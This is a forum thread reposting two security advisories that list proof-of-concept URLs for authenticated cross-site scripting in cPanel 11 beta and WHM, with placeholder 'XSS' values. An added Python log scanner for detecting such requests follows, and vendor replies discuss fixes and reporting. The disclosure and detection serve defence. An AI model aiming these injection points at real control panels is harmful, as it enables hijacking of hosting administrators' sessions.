CPanel 11 Beta Multiple Cross-Site Scripting

ehostcoua

Registered
Nov 4, 2006
#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 11 Beta
#Poc:
#
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
http://target:2082/frontend/x/files/createdir.html?dir=XSS
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
http://target:2082/frontend/x/err/erredit.html?dir=XSS
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://target:2082/frontend/x/files/createfile.html?dir=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]




#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory:
#http://www.aria-security.com/forum/showthread.php?t=44
#-----------------------------------------------------------
#Software: WebHost Manager (WHM)
#Tested WHM X v3.1.0 (demo.cpanel.net)
#Poc:
#
http://target:2086/scripts2/dochangeemail?user=demo&domain=demo.com&email=XSS
http://target:2086/cgi/addon_config...layusersubject=1&type=redirect&supporturl=XSS
http://target:2086/scripts/editpkg?pkg=XSS
http://target:2086/scripts2/domts2?domain=XSS
http://target:2086/scripts/editzone?domain=XSS
http://target:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS
http://target:2086/scripts/park?domain=demo.com&ndomain=XSS
#
#P.S : Attacker must be authenticated
#
#Contact: [email protected]
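
A defensive check for the endpoints listed in the two advisories above, as an added example that is not part of the original post or of cPanel's code: it scans access-log lines for requests in which one of the named parameters carries HTML markup characters after URL decoding. The log format, sample lines and function names are assumptions constructed for illustration, and the truncated addon_config URL is left out.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Path suffix -> parameters flagged in the advisories above.
WATCHED = {
    "/frontend/x/files/fileop.html": {"fileop"},
    "/frontend/x/files/editit.html": {"file"},
    "/frontend/x/files/createdir.html": {"dir"},
    "/frontend/x/htaccess/dohtaccess.html": {"dir"},
    "/frontend/x/err/erredit.html": {"dir", "file"},
    "/frontend/x/files/createfile.html": {"dir"},
    "/scripts2/dochangeemail": {"email"},
    "/scripts/editpkg": {"pkg"},
    "/scripts2/domts2": {"domain"},
    "/scripts/editzone": {"domain"},
    "/scripts2/dofeaturemanager": {"feature"},
    "/scripts/park": {"ndomain"},
}
# Assumed log shape: Apache-style quoted request line (query strings only).
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"\']')  # characters these parameters should not need

def suspicious_params(uri):
    """Return watched parameter names whose decoded value contains markup."""
    parts = urlsplit(uri)
    watched = next((p for s, p in WATCHED.items() if parts.path.endswith(s)), None)
    if watched is None:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    # Decode a second time so double-encoded values (%253C) are caught too.
    return sorted(n for n, vals in query.items() if n in watched
                  and any(MARKUP.search(unquote_plus(v)) for v in vals))

def scan(lines):
    """Return (line_number, [parameter names]) for each flagged log line."""
    hits = ((n, REQ.search(l)) for n, l in enumerate(lines, 1))
    found = ((n, suspicious_params(m.group(1))) for n, m in hits if m)
    return [(n, p) for n, p in found if p]

# Constructed sample log lines (not real traffic); markup is a benign <b>/<i> tag.
SAMPLE = [
    '192.0.2.10 - demo [10/Mar/2007:10:00:01 +0000] "GET /frontend/x/files/createdir.html?dir=/home/demo/public_html HTTP/1.1" 200 512',
    '192.0.2.10 - demo [10/Mar/2007:10:00:09 +0000] "GET /frontend/x/files/createdir.html?dir=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 530',
    '192.0.2.11 - root [10/Mar/2007:10:01:30 +0000] "GET /scripts/park?domain=demo.com&ndomain=%253Ci%253Ex HTTP/1.1" 200 401',
    '192.0.2.12 - demo [10/Mar/2007:10:02:00 +0000] "GET /frontend/x/index.html?note=%3Cb%3E HTTP/1.1" 200 99',
]
if __name__ == "__main__":
    for n, params in scan(SAMPLE):
        print(f"line {n}: markup in {params}")
```

Access logs record only the query string, so values submitted in a POST body to these scripts are not visible to this check.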
 

carluk

Well-Known Member
Sep 2, 2003
It's in edge at the moment as far as I can see. These problems are being fixed when reported (see change log) although worrying that they are there in the first place. Security is an especially high priority at cPanel given the recent problems according to a recent post by a cPanel guy on WHT - give that what authority you will.

It should also be noted that people in glass houses should not throw stones. :)
 

cPanelDavidG

Technical Product Specialist
Nov 29, 2006
Houston, TX
cPanel Access Level
Root Administrator
Security is a top priority here at cPanel and I would encourage anyone who stumbles across any security issues (not just XSS vulnerabilities) to submit them to [email protected]

In defense of the development team, I do know that they frequently look at and act upon reports from those particular websites. It is also important to note that cPanel 11 is not yet intended for production systems. If it was, we would be pushing the update out via Layer2 to upgrade everyone automatically (who has cPanel automatic update enabled).

It's better to be sterilizing cPanel 11 of security flaws now than when it hits production environments.